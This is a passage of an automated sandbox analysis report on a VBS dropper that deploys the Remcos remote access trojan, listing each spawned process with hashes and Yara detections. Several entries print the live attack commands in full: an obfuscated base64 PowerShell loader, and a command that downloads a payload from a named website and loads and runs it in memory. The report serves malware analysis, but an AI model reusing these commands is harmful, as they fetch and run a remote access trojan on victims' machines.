                                  Commandline:powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:5
                                  Start time:04:55:08
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:04:55:09
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:7
                                  Start time:04:55:11
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0x170000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:8
                                  Start time:04:55:11
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0xc20000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:9
                                  Start time:04:55:11
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:13
                                  Start time:04:55:23
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:14
                                  Start time:04:55:23
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:15
                                  Start time:04:55:24
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:16
                                  Start time:04:55:24
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:17
                                  Start time:04:55:25
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:18
                                  Start time:04:55:25
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:19
                                  Start time:04:55:25
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:20
                                  Start time:04:55:25
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:21
                                  Start time:04:55:26
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Has exited:true

                                  General

                                  Target ID:22
                                  Start time:04:55:28
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:23
                                  Start time:04:55:28
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:24
                                  Start time:04:55:28
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:25
                                  Start time:04:55:30
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:26
                                  Start time:04:55:30
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0x140000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:27
                                  Start time:04:55:30
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0x510000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Has exited:true

                                  General

                                  Target ID:28
                                  Start time:04:55:31
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:29
                                  Start time:04:55:31
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:30
                                  Start time:04:55:32
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:31
                                  Start time:04:55:32
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:32
                                  Start time:04:55:33
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:33
                                  Start time:04:55:33
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                                  Imagebase:0x7ff67be20000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:34
                                  Start time:04:55:33
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:35
                                  Start time:04:55:33
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:36
                                  Start time:04:55:34
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Has exited:true

                                  General

                                  Target ID:37
                                  Start time:04:55:36
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:38
                                  Start time:04:55:36
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:39
                                  Start time:04:55:36
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:40
                                  Start time:04:55:37
                                  Start date:26/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:41
                                  Start time:04:55:38
                                  Start date:26/09/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0x30000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:16.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:12
                                    Total number of Limit Nodes:0

                                    Executed Functions

                                    Function 00007FFD9B97078D Relevance: 2.2, Instructions: 2181COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3038197059.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1e83fd9914ae3a9e22e2362c80290ef68a6538bd813b7d2cfab3f78eca558c80
                                    • Instruction ID: afa0659339431e617c1cd0c363710ba9b5fcf253c5def77002ed9867be16fe10
                                    • Opcode Fuzzy Hash: 1e83fd9914ae3a9e22e2362c80290ef68a6538bd813b7d2cfab3f78eca558c80
                                    • Instruction Fuzzy Hash: F7D26722B1EBC91FEB66976858B55B47BE1EF86614B0901FBD08DC71E3DD08AD06C381
                                    Function 00007FFD9B8A74D4 Relevance: 2.0, APIs: 1, Instructions: 470processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3022530563.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: dcdcba03f55aa2ef22f93fa55de90b83c27dda0ab71241ac15917546a79786bc
                                    • Instruction ID: 0a9abb89ac25f106cbe3e75e3ef1d51f0b1b2e4133a04086d1ee9a14af12f050
